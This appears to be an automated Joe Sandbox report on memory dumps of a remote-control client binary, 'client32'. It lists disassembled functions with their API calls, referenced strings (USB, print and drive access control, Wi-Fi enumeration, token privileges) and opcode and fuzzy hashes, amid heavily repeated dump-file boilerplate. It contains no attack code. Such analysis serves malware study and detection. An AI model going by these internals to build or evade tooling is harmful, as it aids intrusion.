PLATFORM.CPP, xrefs: 110FD159
*Log_%d, xrefs: 110FD06C
Event. %s, xrefs: 110FD1A6
LogWhileConnected, xrefs: 110FD10F
Client, xrefs: 110FD089, 110FD114
nstrings <= 4, xrefs: 110FD15E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CurrentThread$ErrorLast__wcstoi64
String ID: *Log_%d$Client$Event. %s$LogWhileConnected$PLATFORM.CPP$nstrings <= 4
API String ID: 2021241812-3565238984
Opcode ID: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
Instruction ID: fb898e99375fe03a3fe41083e55742ce7b0b576ff4a7e429a818e7135f918612
Opcode Fuzzy Hash: eb309260b65eb184e950d2832ff89cbda71d3e6208cd11c1851e8b991c9664c9
Instruction Fuzzy Hash: 72514935E00117ABDB11CFA5CC86FBEBBA9FF85718F104579F92597280E734A80187A1

Function 1103D180 Relevance: 17.6, APIs: 1, Strings: 9, Instructions: 146COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 1103D1D3

Strings

e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h, xrefs: 1103D27F
SETOPTICALDRIVEACCESSACCESSMODES=%u, xrefs: 1103D22F
BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1, xrefs: 1103D25B
SETUSBMASSSTORAGEACCESSACCESSMODES=%u, xrefs: 1103D206
SETUSBMASSSTORAGEACCESS, xrefs: 1103D1E3
SETOPTICALDRIVEACCESS, xrefs: 1103D214
RESUMEPRINTINGPRINTER=*FILETYPES=, xrefs: 1103D262
IsA(), xrefs: 1103D284
BLOCKPRINTING, xrefs: 1103D23D

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: BLOCKPRINTING$BLOCKPRINTINGPRINTER=*FILETYPES=BLOCK=1$IsA()$RESUMEPRINTINGPRINTER=*FILETYPES=$SETOPTICALDRIVEACCESS$SETOPTICALDRIVEACCESSACCESSMODES=%u$SETUSBMASSSTORAGEACCESS$SETUSBMASSSTORAGEACCESSACCESSMODES=%u$e:\nsmsrc\nsm\1210\1210f\ctl32\NSMString.h
API String ID: 4104443479-1830555902
Opcode ID: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
Instruction ID: 0533b61ff5f256c00753904ec1df5a7198c5ed9dcfad6114a4b50a325be8fdd6
Opcode Fuzzy Hash: 952331b7223306ca7450c8f18610b3119baf94f2aaa2caf242e55afce37e2c4c
Instruction Fuzzy Hash: BE41B779A1021AAFCB01CF94CC90FEEB7F8EF55319F044569E855A7241EB35E904C7A1

Function 11045364 Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 217COMMON

Download Yara Rule

APIs

SysFreeString.OLEAUT32(00000000), ref: 1104545D
GetTickCount.KERNEL32 ref: 110454A6
GetTickCount.KERNEL32 ref: 110454C6

Strings

IsMember(%ls, %ls) ret %d, took %u ms, xrefs: 110454E6
RecIsMember(%ls, %ls) ret %d, took %u ms, xrefs: 11045544

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountTick$FreeString
String ID: IsMember(%ls, %ls) ret %d, took %u ms$RecIsMember(%ls, %ls) ret %d, took %u ms
API String ID: 2011556836-2400621309
Opcode ID: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
Instruction ID: 400cf60c0998823ea0bb6020a3248241c8ed3d764918c69dd9f09d3b4840e21c
Opcode Fuzzy Hash: 4996816fcb2d09a22c30fafb4ed933fee1bc220f868133df278643c3e2cb817a
Instruction Fuzzy Hash: AE816471E0021A9BDB20DF54CC90BAAB3B5EF88714F1045E8D909D7A84EB75AE81CF90

Function 11059020 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 164synchronizationtimeCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000003E8,CF3D35D0), ref: 11059069
EnterCriticalSection.KERNEL32(?), ref: 110590CE
timeGetTime.WINMM ref: 110590FC
GetTickCount.KERNEL32 ref: 11059136
LeaveCriticalSection.KERNEL32(?), ref: 110591AA
EnterCriticalSection.KERNEL32(?), ref: 110591C4
LeaveCriticalSection.KERNEL32(?), ref: 110591E9

Strings

_License, xrefs: 11059167
maxslaves, xrefs: 11059162

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$CountObjectSingleTickTimeWaittime
String ID: _License$maxslaves
API String ID: 3724810986-253336860
Opcode ID: c4747356edef85b26a8d255d985f731fa2ac90c82b36329bf0764cc89e95cc70
Instruction ID: b9473765ee5a894416c22d4106f00ac8eee3be5f778696d0a0a90b9ce83e720c
Opcode Fuzzy Hash: c4747356edef85b26a8d255d985f731fa2ac90c82b36329bf0764cc89e95cc70
Instruction Fuzzy Hash: 49518E71E006269BCB85CFA5C884A6EFBF9FB49704B10866DE925D7244F730E910CBA1

Function 1100B760 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 149COMMON

Download Yara Rule

APIs

GetOverlappedResult.KERNEL32(?,CF3D3390,FFFFFFFF,00000001), ref: 1100B7AC
GetLastError.KERNEL32 ref: 1100B7B6
GetTickCount.KERNEL32 ref: 1100B819
wsprintfA.USER32 ref: 1100B856
ResetEvent.KERNEL32(?), ref: 1100B90F

Strings

Audio, xrefs: 1100B8B0, 1100B8D0
New hooked channels,bitspersample=%d,%d (old %d,%d), xrefs: 1100B894, 1100B8F7
Hook_channels, xrefs: 1100B8AB
Hook_bits_per_sample, xrefs: 1100B8CB

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: CountErrorEventLastOverlappedResetResultTickwsprintf
String ID: Audio$Hook_bits_per_sample$Hook_channels$New hooked channels,bitspersample=%d,%d (old %d,%d)
API String ID: 3598861413-432254317
Opcode ID: 88086ed7cad01db98769a6e7f02a836ab8858efd9f4792b07cbe4e8a26896150
Instruction ID: bce60c6a70f4087aecce3b408ab27d19c814a1bd4bae8f21e2f5314e0b08db4f
Opcode Fuzzy Hash: 88086ed7cad01db98769a6e7f02a836ab8858efd9f4792b07cbe4e8a26896150
Instruction Fuzzy Hash: E751D4B8D00A1AABE710DF65CC84ABBB7F8EF44748F10855DF96A92281E7347580C7A5

Function 1104B12F Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 126windowCOMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

PostMessageA.USER32(0000FFFF,0000C1E7,00000000,00000000), ref: 1104B225
PostMessageA.USER32(000104E4,0000048F,00000032,00000000), ref: 1104B256
PostMessageA.USER32(000104E4,00000483,00000000,00000000), ref: 1104B268
PostMessageA.USER32(000104E4,0000048F,000000C8,00000000), ref: 1104B27C
PostMessageA.USER32(000104E4,00000483,00000001,?), ref: 1104B293
PostMessageA.USER32(000104E4,00000800,00000000,00000000), ref: 1104B2A4

Strings

tVPq, xrefs: 1104B165
Client, xrefs: 1104B13C
UnloadMirrorOnEndView, xrefs: 1104B137

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: MessagePost$__wcstoi64
String ID: Client$UnloadMirrorOnEndView$tVPq
API String ID: 1802880851-2026197083
Opcode ID: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
Instruction ID: 72b0dfb70f0a874fb1e004092d90b5695b323917c743566986231bfe2b7fd1fa
Opcode Fuzzy Hash: f90317bc389818a7d6923112d6339fcabc99c06439f7a0e866445f586ece45cc
Instruction Fuzzy Hash: E6412775B025257BD311DBA4CC85FEBB7AABF89708F1081A9F61497284DB70B900CBD4

Function 11027310 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 89COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 1102732F
OpenProcessToken.ADVAPI32(00000000), ref: 11027336
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,00000000,?), ref: 11027358
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?), ref: 11027378
LookupPrivilegeNameA.ADVAPI32(00000000,00000004,?,?), ref: 11027399
_free.LIBCMT ref: 110273C4
CloseHandle.KERNEL32(?), ref: 110273D6

Strings

Luid Low=%x, High=%x, Attr=%x, name=%s, xrefs: 110273AE
@, xrefs: 1102738E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: Token$InformationProcess$CloseCurrentHandleLookupNameOpenPrivilege_free
String ID: @$Luid Low=%x, High=%x, Attr=%x, name=%s
API String ID: 2058255784-3275751932
Opcode ID: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
Instruction ID: ade80763f836c408a2a1d446ea8312ce3e6dd7fa4b179276d35611dba123a850
Opcode Fuzzy Hash: 197ac4509fec381f452636feafc602bd77caf5c095f428f5ea260a9a992fb28b
Instruction Fuzzy Hash: D42176B5D0021AAFD710DFE4DC85EAFBBBDEF44704F108119EA15A7240D770A906CBA1

Function 110570C0 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 228COMMON

Download Yara Rule

APIs

Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D

GetTickCount.KERNEL32 ref: 11057136

Part of subcall function 11157010: LoadLibraryA.KERNEL32(wlanapi.dll,?,11057147), ref: 1115705B
Part of subcall function 11157010: GetProcAddress.KERNEL32(00000000,WlanOpenHandle), ref: 11157074
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanCloseHandle), ref: 11157084
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanEnumInterfaces), ref: 11157094
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanGetAvailableNetworkList), ref: 111570A4
Part of subcall function 11157010: GetProcAddress.KERNEL32(?,WlanFreeMemory), ref: 111570B4

GetTickCount.KERNEL32 ref: 11057293

Strings

gfff, xrefs: 11057112
e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h, xrefs: 110572D6, 11057302
Info. NC_WIRELESS took %d ms, xrefs: 110572A2
Client, xrefs: 110570FA
DisableWirelessInfo, xrefs: 110570F5
IsA(), xrefs: 110572DB, 11057307

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: AddressProc$CountTick$LibraryLoad__wcstoi64
String ID: Client$DisableWirelessInfo$Info. NC_WIRELESS took %d ms$IsA()$e:\nsmsrc\nsm\1210\1210f\ctl32\DataStream.h$gfff
API String ID: 1442689885-2337161965
Opcode ID: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
Instruction ID: 84ed5054cfcb45ae474b39cb997af099e397576dfe613bc4edcee20f92af9c19
Opcode Fuzzy Hash: 3312380c41981f34bd337f774f96d03f519effdcfe3ca8d7960d65f644104a37
Instruction Fuzzy Hash: F8916D75E0065E9FCB45CF94C884AEEF7B6BF58318F104158E819AB281DB30AE45CBA1

Function 11127780 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 212windowtimeCOMMON

Download Yara Rule

APIs

EnumWindows.USER32(111276D0,?), ref: 111277D8

Part of subcall function 1110C4A0: _memset.LIBCMT ref: 1110C4D2

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 11127829
GetWindowTextA.USER32(?,?,00000104), ref: 11127869
SendMessageTimeoutA.USER32(?,00000000,00000000,00000000,00000002,000001F4,?), ref: 11127914
_memmove.LIBCMT ref: 1112798F
_memset.LIBCMT ref: 111279FC
DeleteDC.GDI32(?), ref: 11127A0B

Strings

DISPLAY, xrefs: 1112781E

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_11000000_client32.jbxd

Yara matches

Similarity

API ID: _memset$CreateDeleteEnumMessageSendTextTimeoutWindowWindows_memmove
String ID: DISPLAY
API String ID: 790809857-865373369
Opcode ID: a36cf931a0b0a38a5121a637b2b1593bb62e7df1d52cb012501d7896bd6d5a55
Instruction ID: daf97ec175890095a15a187f0d211b8f7d4f5fc3452f74960e728b40ba9e4cf9
Opcode Fuzzy Hash: a36cf931a0b0a38a5121a637b2b1593bb62e7df1d52cb012501d7896bd6d5a55
Instruction Fuzzy Hash: EE8141B5E006299BDB25CF55CD85BEAF7B8EB48314F5085D5E909A7240EB30AE80CF90

Function 110CF280 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 158COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 110CF2A0

Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBC8
Part of subcall function 1115CBB3: __CxxThrowException@8.LIBCMT ref: 1115CBDD
Part of subcall function 1115CBB3: std::exception::exception.LIBCMT ref: 1115CBEE

_memmove.LIBCMT ref: 110CF327
_memmove.LIBCMT ref: 110CF34B
_memmove.LIBCMT ref: 110CF385
_memmove.LIBCMT ref: 110CF3A1
std::exception::exception.LIBCMT ref: 110CF3EB
__CxxThrowException@8.LIBCMT ref: 110CF400

Strings

deque<T> too long, xrefs: 110CF29B

Memory Dump Source

Source File: 00000007.00000002.4193065228.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true

Associated: 00000007.00000002.4193044060.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193182910.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193219986.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193241293.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
Associated: 00000007.00000002.4193267881.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
